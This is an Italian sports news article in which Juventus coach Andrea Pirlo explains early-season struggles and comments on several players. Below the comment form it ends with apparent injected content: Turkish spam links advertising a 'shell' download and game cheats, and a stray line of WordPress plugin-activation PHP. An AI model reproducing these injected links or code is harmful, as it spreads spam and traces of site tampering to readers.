Juventus, Pirlo: “Torneremo presto davanti”


L’allenatore bianconero: “Abbiamo bisogno di tempo e di poterci allenare tutti assieme. Ronaldo? Speriamo di riaverlo presto”

Lavoro con tutti i giocatori e tempo. È quello che chiede Andrea Pirlo. Il tecnico della Juventus sa che perdere punti per strada non è una bella cosa, ma è anche consapevole di poter recuperare il terreno perduto in questo tormentato inizio di campionato.

giovani da far crescere

—  

“Purtroppo – esordisce Pirlo – nelle ultime due partite siamo rimasti in dieci per nostre leggerezze, allora bisogna sacrificarsi come a Roma e come stasera. Ma siamo una squadra giovane che ha bisogno di lavorare. Abbiamo lavorato poco in questi primi mesi, i giocatori sono stati in nazionale e i giovani devono fare esperienza giocando queste prime partite. Capita, quindi, che qualche leggerezza la possano commettere. Juve troppo giovane oggi? No, è la squadra che abbiamo, una squadra giovane e di qualità, ma in costruzione, quindi abbiamo bisogno di tempo. I giovani hanno bisogno di sbagliare e lo devono fare anche in queste partite”.

quante difficoltà

—  

Pirlo ha spiegato quali sono le difficoltà che stanno impedendo alla Juve di esprimersi al meglio. “Abbiamo provato pochissimo la partita, i ragazzi sono tornati giovedì dalle nazionali, abbiamo provato ieri a trovare delle soluzioni per giocare in verticale e attaccare la profondità, il gol infatti è nato da una situazione di questo genere. Abbiamo poi sbagliato qualche scelta nel pressing sulla destra, ma capita perché non abbiamo avuto tempo per oliare i meccanismi. Abbiamo bisogno di lavorare tutti assieme, almeno per un po'”.

singoli e avversarie

—  

“Kulusevski – spiega ancora Pirlo – deve essere bravo a cercarsi la posizione, a volte può stare centrale, a volte sul centro-sinistra, a volte largo. Morata stava bene, aveva voglia di giocare. Era uno dei cinque che è rimasto a Torino, mentre tutti i nazionali di fatto li abbiamo avuti soltanto ieri”. “Arthur ha caratteristiche particolari, da calcio spagnolo. Fa ancora troppi tocchi, mentre in certe occasioni potrebbe velocizzare. Ci stiamo lavorando. Dybala era reduce da un problema intestinale e si è allenato solo ieri, non era la partita ideale per fargli fare minuti. Ronaldo sta bene, è a casa, ma speriamo di riaverlo presto. Buffon? Vederlo in porta fa sempre un bell’effetto e dà sempre sicurezza”. E sulle avversarie che stanno scappando (Milan e Napoli) l’allenatore bianconero precisa: “Sapevamo che ci saranno tante squadre che lotteranno per il titolo, sarà una battaglia giornata dopo giornata, bisogna fare punti, purtroppo ne stiamo perdendo qualcuno per strada, ma siamo in costruzione e torneremo presto davanti”.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );